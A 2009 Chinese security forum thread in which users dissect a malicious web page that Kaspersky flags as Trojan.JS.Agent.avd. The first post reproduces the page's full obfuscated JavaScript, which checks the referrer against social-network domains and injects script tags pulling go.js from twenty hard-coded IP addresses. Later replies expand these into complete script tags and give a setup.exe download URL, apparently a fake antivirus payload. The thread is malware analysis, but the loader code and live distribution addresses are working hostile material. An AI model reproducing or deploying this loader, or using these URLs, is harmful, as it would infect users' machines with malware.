hxxp://suntico-dev.com/950/index.php?go （求解）

幸福的猪猪

卡巴斯基报：Trojan.JS.Agent.avd

以下是复制出来的网页源代码：

1. <script>
   
2. // KROTEG
   
3. var nyjhaudxqpfltrzovb5 = [
   
4. ['facebook.com', 'fb2'],
   
5. ['tagged.com', 'tg'],
   
6. ['friendster.com','fr'],
   
7. ['myspace.com', 'ms'],
   
8. ['msplinks.com', 'ms'],
   
9. ['lnk.ms', 'ms'],
   
10. ['myyearbook.com','yb'],
    
11. ['fubar.com', 'fu'],
    
12. ['twitter.com', 'tw'],
    
13. ['hi5.com', 'hi5'],
    
14. ['bebo.com', 'be']
    
15. ];
    
16. var koatphcqzdfyn3 = [
    
17. '84.108' + '.201.115',
    
18. '99.236' + '.198.29',
    
19. '209.' + '237.70.23',
    
20. '82.2' + '.200.130',
    
21. '99.68' + '.108.48',
    
22. '69.1' + '51.177.17',
    
23. '173.19' + '.66.108',
    
24. '98.6' + '4.120.184',
    
25. '2' + '17.132.206.13',
    
26. '93.1' + '72.118.225',
    
27. '190.' + '213.59.90',
    
28. '96' + '.32.255.162',
    
29. '24.151' + '.252.86',
    
30. '76' + '.187.28.115',
    
31. '75.87' + '.196.183',
    
32. '69' + '.244.21.21',
    
33. '21' + '2.30.204.44',
    
34. '75.141' + '.137.188',
    
35. '1' + '73.21.48.201',
    
36. '173.32' + '.167.235',
    
37. ];
    
38. var tovsizy0 = '', rjxfoq2 = '', gpfknwlmqirozedstx6 = '', hgzcxlkqnfmyrpib0 = '';
    
39. var ucglixmhwqknroa9 = '' + eval('doc'+tovsizy0+'ume'+rjxfoq2+'nt.r'+gpfknwlmqirozedstx6+'efer'+hgzcxlkqnfmyrpib0+'rer'), qebduwt3 = '';
    
40. for (var oybimfjdcgeszr0 = 0; oybimfjdcgeszr0 < nyjhaudxqpfltrzovb5.length; oybimfjdcgeszr0 ++) {
    
41. if ((ucglixmhwqknroa9.indexOf(nyjhaudxqpfltrzovb5[oybimfjdcgeszr0][0]) != -1)) {
    
42. qebduwt3 = '/f=' + nyjhaudxqpfltrzovb5[oybimfjdcgeszr0][1];
    
43. break;
    
44. }
    
45. }
    
46. if ((ucglixmhwqknroa9.indexOf('google.com/reader/shared') != -1) && (ucglixmhwqknroa9.indexOf('?id=') != -1)) qebduwt3 = '/f=ms';
    
47. if (location.href.indexOf('?go&ms') != -1) qebduwt3 = '/f=ms';
    
48. window.redirect = '';
    
49. function nucqajgxvms4() {
    
50. var rbhyojlct5 = '' + eval('win'+'dow.r'+'edir'+'ect;');
    
51. if (rbhyojlct5.length > 0) eval('wi'+'ndow'+'.lo'+'cati'+'on.hr'+'ef = rbhyojlct5;');
    
52. else setTimeout('nucqajgxvms4()', 50);
    
53. }
    
54. nucqajgxvms4();
    
55. var js = '/vi'+'ew', l = '' + eval('loc'+'at'+'ion.'+'hr'+'ef');
    
56. var n = l.indexOf('?i'+'d=');
    
57. if (n != -1) {
    
58. n = parseInt(l.substr(n + 4));
    
59. if (n < 101) js = '/c'+'ne'+'t';
    
60. else if (n < 201) js = '/vi'+'ew';
    
61. else if (n < 301) js = '/sc'+'an';
    
62. else if (n < 401) js = '/vi'+'ew';
    
63. else if (n < 501) js = '/y'+'out'+'ube';
    
64. }
    
65. var ss = '' + eval('l'+'oca'+'ti'+'on.s'+'ear'+'ch');
    
66. ss = (ss.length > 0 ? ss : '');
    
67. for (var oybimfjdcgeszr0 = 0; oybimfjdcgeszr0 < koatphcqzdfyn3.length; oybimfjdcgeszr0 ++) {
    
68. var nn = 'sc'+'rip'+'t', oxckdfgn8 = document.createElement(nn);
    
69. oxckdfgn8.type = 'te'+'xt'+'/ja'+'va'+nn;
    
70. oxckdfgn8.src = 'ht'+'tp:'+'//' + koatphcqzdfyn3[oybimfjdcgeszr0] + '/go' + '.js' + '?0x'+'3E'+'8' + qebduwt3 + js + '/co'+'nsol'+'e=y'+'es/' + ss;
    
71. document.getElementsByTagName('h'+'ea'+'d')[0].appendChild(oxckdfgn8);
    
72. }
    
73. 
    
74. </script>
    

复制代码

zdlzp

hxxp://99.236.198.29/d=suntico-dev.com/0x3E8/view/console=yes/setup.exe

knifed

[i=s] 本帖最后由 knifed 于 2009-12-12 16:32 编辑 [/i]

oxckdfgn8.src = 'ht'+'tp:'+'//' + koatphcqzdfyn3[oybimfjdcgeszr0] + '/go' + '.js' + '?0x'+'3E'+'8' + qebduwt3 + js + '/co'+'nsol'+'e=y'+'es/' + ss;  大致从以下地址下载
<SCRIPT src="http://84.108.201.115/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://99.236.198.29/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://209.237.70.23/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://82.2.200.130/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://99.68.108.48/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://69.151.177.17/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.19.66.108/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://98.64.120.184/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://217.132.206.13/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://93.172.118.225/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://190.213.59.90/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://96.32.255.162/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://24.151.252.86/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://76.187.28.115/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://75.87.196.183/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://69.244.21.21/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://212.30.204.44/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://75.141.137.188/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.21.48.201/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://173.32.167.235/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT><SCRIPT src="http://undefined/go.js?0x3E8/view/console=yes/?go" type=text/javascript></SCRIPT>
像是个fake av
最终想下载http://82.2.200.130/d=suntico-dev.com/0x3E8/view/console=yes/setup.exe
有几个地址ms打不开.